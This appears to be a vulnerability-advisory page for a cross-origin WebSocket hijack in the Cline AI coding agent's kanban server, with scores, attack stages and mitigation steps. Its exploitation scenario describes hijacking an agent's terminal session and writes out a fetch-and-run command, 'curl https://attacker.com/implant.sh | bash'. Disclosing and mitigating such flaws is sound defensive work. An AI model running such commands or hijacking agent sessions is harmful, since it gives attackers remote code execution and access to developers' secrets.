CVE-2026-44211: Cline WebSocket auth bypass

Q: Is CVE-2026-44211 actively exploited?

No confirmed active exploitation of CVE-2026-44211 has been reported, but organizations should still patch proactively.

Q: How to fix CVE-2026-44211?

1. Immediately stop running `cline --kanban` during normal web browsing until a patched release is available. 2. Block port 3484 via host firewall (macOS: `sudo /usr/libexec/ApplicationFirewall/socketfilterfw`, or add an outbound rule blocking localhost:3484 from browser processes). 3. Verify no kanban process is running: `lsof -i :3484` on macOS/Linux, kill any unexpected listener. 4. Monitor for a patched kanban release that adds Origin header validation and a startup-generated secret token required on all WebSocket connection upgrades. 5. If compromise is suspected, rotate all API keys, cloud credentials, SSH keys, and secrets that may have been accessible from the affected workstation. 6. Review shell history and cline session logs for unexpected command execution.

Q: What systems are affected by CVE-2026-44211?

This vulnerability affects the following AI/ML architecture patterns: AI coding agents, local AI development environments, agent frameworks, developer tooling.

Q: What is the CVSS score for CVE-2026-44211?

CVE-2026-44211 has a CVSS v3.1 base score of 9.6 (CRITICAL). The EPSS exploitation probability is 0.15%.

CISO Take

The kanban component of the cline AI coding agent exposes three unauthenticated WebSocket endpoints on localhost:3484 that any website can silently connect to — no CORS restrictions apply to WebSocket connections. An attacker who tricks a developer into visiting a malicious page can immediately receive a full snapshot of their workspace including filesystem paths, git branches, and AI agent chat history, then hijack active agent sessions by injecting arbitrary shell commands that execute with the developer's OS privileges. The CVSS score is 9.6 Critical, exploitation requires only that the victim has kanban running and loads any attacker-controlled webpage — a public interactive PoC is already live — and no patch exists as of disclosure for cline v2.13.0 or kanban v0.1.59. Immediate workaround is to stop running cline with the kanban flag during normal web browsing and block port 3484 via host firewall until a patched release ships.

Sources: NVD GitHub Advisory ATLAS

What is the risk?

CVSS 9.6 Critical with a network-reachable attack vector and trivially low exploitation barrier. The attack is entirely browser-based JavaScript requiring no special tools or AI/ML knowledge — a functional public PoC is hosted and operational at time of disclosure. Because the affected service is a local developer tool, every engineer running cline on their workstation is a potential target, and the blast radius extends to any codebase, secrets, or cloud credentials accessible from the compromised developer machine. No authentication, no origin validation, and no session token separates legitimate UI traffic from attacker-controlled JavaScript, making this a reliable pre-patch exploitation target.

How does the attack unfold?

Drive-by Initial Access

Developer visits an attacker-controlled webpage while cline kanban is running; browser JavaScript silently initiates a WebSocket connection to ws://127.0.0.1:3484/api/runtime/ws with no user interaction required.

AML.T0078

Workspace Reconnaissance

The runtime WebSocket immediately delivers a full JSON snapshot revealing workspace filesystem paths, active git branch, task titles and descriptions, and live AI agent chat messages.

AML.T0084

Session Detection & Targeting

Attacker's JavaScript monitors the runtime stream for task_sessions_updated events to identify active AI agent sessions and extract their taskId and workspaceId identifiers needed for the next stage.

AML.T0051.000

Terminal Hijack & RCE

Attacker connects to /api/terminal/io with the leaked session identifiers and writes arbitrary shell commands followed by a carriage return; the AI agent executes them immediately with the developer's OS privileges.

AML.T0112.000

Drive-by Initial Access

Developer visits an attacker-controlled webpage while cline kanban is running; browser JavaScript silently initiates a WebSocket connection to ws://127.0.0.1:3484/api/runtime/ws with no user interaction required.

AML.T0078

Workspace Reconnaissance

The runtime WebSocket immediately delivers a full JSON snapshot revealing workspace filesystem paths, active git branch, task titles and descriptions, and live AI agent chat messages.

AML.T0084

Session Detection & Targeting

Attacker's JavaScript monitors the runtime stream for task_sessions_updated events to identify active AI agent sessions and extract their taskId and workspaceId identifiers needed for the next stage.

AML.T0051.000

Terminal Hijack & RCE

Attacker connects to /api/terminal/io with the leaked session identifiers and writes arbitrary shell commands followed by a carriage return; the AI agent executes them immediately with the developer's OS privileges.

AML.T0112.000

What systems are affected?

Package	Ecosystem	Vulnerable Range	Patched
Cline	npm	<= 2.13.0	No patch
63.6K 2 dependents Pushed 2d ago 50% patched ~0d to patch Full package profile →

Do you use Cline? You're affected.

How severe is it?

CVSS 3.1

9.6 / 10

EPSS

0.2%

chance of exploitation in 30 days

Higher than 5% of all CVEs

Source: EPSS v3 — FIRST.org

Exploitation Status

Exploit Available

Exploitation: MEDIUM

Sophistication

Trivial

Exploitation Confidence

medium

○ CISA SSVC: Public PoC

Composite signal derived from CISA KEV, VulnCheck KEV, CISA SSVC, EPSS, Metasploit, Exploit-DB, trickest/cve, Nuclei templates, and inthewild.io exploitation reports.

What is the attack surface?

AV Network

AC Low

PR None

UI Required

S Changed

C High

I High

A High

What should I do?

6 steps

Immediately stop running cline --kanban during normal web browsing until a patched release is available.
Block port 3484 via host firewall (macOS: sudo /usr/libexec/ApplicationFirewall/socketfilterfw, or add an outbound rule blocking localhost:3484 from browser processes).
Verify no kanban process is running: lsof -i :3484 on macOS/Linux, kill any unexpected listener.
Monitor for a patched kanban release that adds Origin header validation and a startup-generated secret token required on all WebSocket connection upgrades.
If compromise is suspected, rotate all API keys, cloud credentials, SSH keys, and secrets that may have been accessible from the affected workstation.
Review shell history and cline session logs for unexpected command execution.

What does CISA's SSVC say?

Decision Attend

Exploitation poc

Automatable No

Technical Impact total

Source: CISA Vulnrichment (SSVC v2.0). Decision based on the CISA Coordinator decision tree.

How is it classified?

Auth Bypass Code Execution Data Leakage Agent Plugin AML.T0025 - Exfiltration via Cyber Means AML.T0029 - Denial of AI Service AML.T0051.000 - Direct AML.T0053 - AI Agent Tool Invocation AML.T0078 - Drive-by Compromise AML.T0084 - Discover AI Agent Configuration AML.T0112.000 - Local AI Agent

Which compliance frameworks are affected?

This CVE is relevant to:

EU AI Act

Article 15 - Accuracy, robustness and cybersecurity

ISO 42001

A.9.5 - Security of AI systems

NIST AI RMF

MANAGE 2.2 - AI risk response plans

OWASP LLM Top 10

LLM01:2025 - Prompt Injection LLM02:2025 - Sensitive Information Disclosure LLM06:2025 - Excessive Agency

Frequently Asked Questions

What is CVE-2026-44211?

The kanban component of the cline AI coding agent exposes three unauthenticated WebSocket endpoints on localhost:3484 that any website can silently connect to — no CORS restrictions apply to WebSocket connections. An attacker who tricks a developer into visiting a malicious page can immediately receive a full snapshot of their workspace including filesystem paths, git branches, and AI agent chat history, then hijack active agent sessions by injecting arbitrary shell commands that execute with the developer's OS privileges. The CVSS score is 9.6 Critical, exploitation requires only that the victim has kanban running and loads any attacker-controlled webpage — a public interactive PoC is already live — and no patch exists as of disclosure for cline v2.13.0 or kanban v0.1.59. Immediate workaround is to stop running cline with the kanban flag during normal web browsing and block port 3484 via host firewall until a patched release ships.

Is CVE-2026-44211 actively exploited?

No confirmed active exploitation of CVE-2026-44211 has been reported, but organizations should still patch proactively.

How to fix CVE-2026-44211?

1. Immediately stop running `cline --kanban` during normal web browsing until a patched release is available. 2. Block port 3484 via host firewall (macOS: `sudo /usr/libexec/ApplicationFirewall/socketfilterfw`, or add an outbound rule blocking localhost:3484 from browser processes). 3. Verify no kanban process is running: `lsof -i :3484` on macOS/Linux, kill any unexpected listener. 4. Monitor for a patched kanban release that adds Origin header validation and a startup-generated secret token required on all WebSocket connection upgrades. 5. If compromise is suspected, rotate all API keys, cloud credentials, SSH keys, and secrets that may have been accessible from the affected workstation. 6. Review shell history and cline session logs for unexpected command execution.

What systems are affected by CVE-2026-44211?

This vulnerability affects the following AI/ML architecture patterns: AI coding agents, local AI development environments, agent frameworks, developer tooling.

What is the CVSS score for CVE-2026-44211?

CVE-2026-44211 has a CVSS v3.1 base score of 9.6 (CRITICAL). The EPSS exploitation probability is 0.15%.

What is the AI security impact?

Affected AI Architectures

AI coding agentslocal AI development environmentsagent frameworksdeveloper tooling

MITRE ATLAS Techniques

AML.T0025 Exfiltration via Cyber Means

AML.T0029 Denial of AI Service

AML.T0051.000 Direct

AML.T0053 AI Agent Tool Invocation

AML.T0078 Drive-by Compromise

AML.T0084 Discover AI Agent Configuration

AML.T0112.000 Local AI Agent

Compliance Controls Affected

EU AI Act: Article 15

ISO 42001: A.9.5

NIST AI RMF: MANAGE 2.2

OWASP LLM Top 10: LLM01:2025, LLM02:2025, LLM06:2025

What are the technical details?

Original Advisory

Cline is an autonomous coding agent as an SDK, IDE extension, or CLI assistant. In versions 2.13.0 and prior, there is a cross-origin WebSocket hijack vulnerability in Cline Kanban servers. At time of publication, there are no publicly available patches.

Exploitation Scenario

A threat actor targeting AI/ML developers registers a plausible developer-resource domain and hosts a page with approximately 50 lines of JavaScript. When a developer visits this page while cline kanban is running, the script silently connects to ws://127.0.0.1:3484/api/runtime/ws and within milliseconds receives a JSON snapshot revealing the project name, filesystem path, git branch (e.g., 'feature/unreleased-product'), and any active AI task descriptions. The script then subscribes to live updates and waits for a task_sessions_updated event indicating an active AI agent session. Once detected, it connects to /api/terminal/io with the leaked taskId and workspaceId parameters and writes `curl https://attacker.com/implant.sh | bash ` — the carriage return submits the input exactly as if the developer pressed Enter. The AI agent receives this as a user message and executes the shell command, establishing a reverse shell with the developer's full OS privileges within seconds of the page load.

Weaknesses (CWE)

CWE-1385 Missing Origin Validation in WebSockets Primary CWE-1385 Missing Origin Validation in WebSockets Primary CWE-306 Missing Authentication for Critical Function Primary CWE-306 Missing Authentication for Critical Function Primary CWE-1385 Missing Origin Validation in WebSockets CWE-306 Missing Authentication for Critical Function

CWE-1385 — Missing Origin Validation in WebSockets: The product uses a WebSocket, but it does not properly verify that the source of data or communication is valid.

[Implementation] Enable CORS-like access restrictions by verifying the 'Origin' header during the WebSocket handshake.
[Implementation] Use a randomized CSRF token to verify requests.

Source: MITRE CWE corpus.